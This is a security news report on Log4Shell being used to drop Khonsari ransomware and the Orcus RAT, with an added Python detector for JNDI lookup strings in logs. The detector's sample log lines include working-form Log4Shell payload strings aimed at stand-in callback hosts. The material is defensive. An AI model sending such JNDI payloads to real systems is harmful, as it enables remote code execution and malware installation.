Privacy Ninja

New Ransomware Now Being Deployed in Log4Shell Attacks

The first public case of the Log4j Log4Shell vulnerability being used to download and install ransomware has been discovered by researchers.

Last Friday, a public exploit was released for a critical zero-day vulnerability named ‘Log4Shell’ in the Apache Log4j Java-based logging platform. Log4j is a development framework that allows developers to add error and event logging into their Java applications.

The vulnerability allows threat actors to create special JNDI strings that, when read by Log4j, cause the platform to connect to and execute code at the included URL. This allows attackers to easily detect vulnerable devices or execute code supplied by a remote site or via Base64 encoded strings.

While this vulnerability was fixed in Log4j 2.15.0 and even tightened further in Log4j 2.16.0, it is being widely exploited by threat actors to install various malware, including coin miners, botnets, and even Cobalt Strike beacons.
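As an added illustration (not from the article or from BitDefender), the Python below scans a few constructed web-server log lines for the JNDI lookup strings described above and extracts the callback hosts a defender would alert on or block outbound; the log lines, IP addresses and hostnames are all made up.

```python
import re

# Constructed Apache-style access log lines for the demo (not from the article).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] '
    '"GET /?q=${JNDI:rmi://callback.example.test/Base64/aGk=} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# Canonical Log4Shell lookup: ${jndi:<scheme>://<host>[:port]/...}
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//?(?P<host>[^/:\s}]+)",
    re.IGNORECASE,
)


def find_jndi_lookups(lines):
    """Return one record per JNDI lookup string found in the given log lines."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for m in JNDI_RE.finditer(line):
            rest = line[m.end():]
            hits.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                # The article notes that payloads may arrive as Base64 strings in the URL path.
                "base64_path": "/base64/" in rest.lower(),
            })
    return hits


def callback_hosts(hits):
    """Distinct callback hosts, for egress blocking or alert enrichment."""
    return sorted({h["host"] for h in hits})


if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOGS)
    for h in found:
        print(f"line {h['line']}: {h['scheme']}://{h['host']} base64={h['base64_path']}")
    print("callback hosts:", callback_hosts(found))
```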

First Log4j exploit installing ransomware

Yesterday, BitDefender reported that they found the first ransomware family being installed directly via Log4Shell exploits.

The exploit downloads a Java class from hxxp://3.145.115[.]94/Main.class that is loaded and executed by the Log4j application.

Once loaded, it would download a .NET binary from the same server to install new ransomware [VirusTotal] named ‘Khonsari.’

This same name is also used as the extension for encrypted files and in the ransom note, as shown below.

[Figure: Khonsari ransom note. Source: BleepingComputer]

In later attacks, BitDefender noticed that this threat actor used the same server to distribute the Orcus Remote Access Trojan.

Likely a wiper

Ransomware expert Michael Gillespie told BleepingComputer that Khonsari uses valid encryption and is secure, meaning that it is not possible to recover files for free.

However, the ransom note has one oddity – it does not appear to include a way to contact the threat actor to pay a ransom.

Emsisoft analyst Brett Callow pointed out to BleepingComputer that the ransomware is named after and uses contact information for a Louisiana antique shop owner rather than the threat actor.

Therefore, it is unclear if that person is the actual victim of the ransomware attack or listed as a decoy.

Regardless of the reason, as it does not contain legitimate contact information for the threat actors, we believe this is a wiper rather than ransomware.

While this may be the first known instance of the Log4j exploit directly installing ransomware (wiper?), Microsoft has already seen the exploits used to deploy Cobalt Strike beacons.

Therefore, it is likely that more advanced ransomware operations are already using the exploits as part of their attacks.
